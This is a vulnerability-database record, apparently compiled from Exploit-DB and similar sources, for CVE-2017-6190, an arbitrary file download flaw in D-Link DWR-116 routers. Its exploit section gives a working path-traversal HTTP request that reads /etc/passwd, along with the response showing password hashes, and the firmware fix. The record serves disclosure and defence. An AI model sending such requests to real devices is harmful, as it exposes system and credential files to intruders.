ID

VAR-E-201704-0087


CVE

cve_id:CVE-2017-6190

Trust: 2.3

cve_id:CVE-2018-10822

Trust: 0.5

cve_id:CVE-2018-10823

Trust: 0.5

cve_id:CVE-2018-10824

Trust: 0.5

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 41840

EDB ID

41840


TITLE

D-Link DWR-116 / DWR-116A1 - Arbitrary File Download - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41840

DESCRIPTION

D-Link DWR-116 / DWR-116A1 - Arbitrary File Download. CVE-2017-6190 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41840

AFFECTED PRODUCTS

vendor:d linkmodel:dwr-116 dwr-116a1scope:eqversion:/

Trust: 1.6

vendor:d linkmodel:dwr-116scope: - version: -

Trust: 0.5

vendor:d linkmodel:plain-text password storagescope: - version: -

Trust: 0.5

vendor:d linkmodel:dwr-116 1.05scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.01scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.00 b10scope: - version: -

Trust: 0.3

vendor:d linkmodel:dwr-116 1.05b09scope:neversion: -

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 41840 // EDBNET: 92542

EXPLOIT

# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)

Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.

PoC:

HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close

root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin

Fix:
Update device to the new firmware (V1.05b09)

Trust: 1.0

sources: EXPLOIT-DB: 41840

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 41840

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41840

TYPE

Arbitrary File Download

Trust: 1.6

sources: EXPLOIT-DB: 41840 // EDBNET: 92542

TAGS

tag:exploit

Trust: 1.0

tag:file inclusion

Trust: 1.0

tag:arbitrary

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 142052 // PACKETSTORM: 149844

CREDITS

Patryk Bogdan

Trust: 0.6

sources: EXPLOIT-DB: 41840

EXTERNAL IDS

db:NVDid:CVE-2017-6190

Trust: 2.3

db:EXPLOIT-DBid:41840

Trust: 1.6

db:EDBNETid:92542

Trust: 0.6

db:PACKETSTORMid:142052

Trust: 0.5

db:NVDid:CVE-2018-10824

Trust: 0.5

db:NVDid:CVE-2018-10822

Trust: 0.5

db:NVDid:CVE-2018-10823

Trust: 0.5

db:PACKETSTORMid:149844

Trust: 0.5

db:BIDid:97620

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 41840 // EDBNET: 92542

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-6190

Trust: 2.0

url:https://www.exploit-db.com/exploits/41840/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2018-10822

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2018-10824

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2018-10823

Trust: 0.5

url:http://seclists.org/bugtraq/2017/apr/28

Trust: 0.3

url:http://www.d-link.com

Trust: 0.3

sources: BID: 97620 // PACKETSTORM: 142052 // PACKETSTORM: 149844 // EXPLOIT-DB: 41840 // EDBNET: 92542

SOURCES

db:BIDid:97620
db:PACKETSTORMid:142052
db:PACKETSTORMid:149844
db:EXPLOIT-DBid:41840
db:EDBNETid:92542

LAST UPDATE DATE

2022-07-27T09:11:31.130000+00:00


SOURCES UPDATE DATE

db:BIDid:97620date:2017-04-18T00:06:00

SOURCES RELEASE DATE

db:BIDid:97620date:2017-04-07T00:00:00
db:PACKETSTORMid:142052date:2017-04-07T19:22:22
db:PACKETSTORMid:149844date:2018-10-18T03:47:09
db:EXPLOIT-DBid:41840date:2017-04-07T00:00:00
db:EDBNETid:92542date:2017-04-12T00:00:00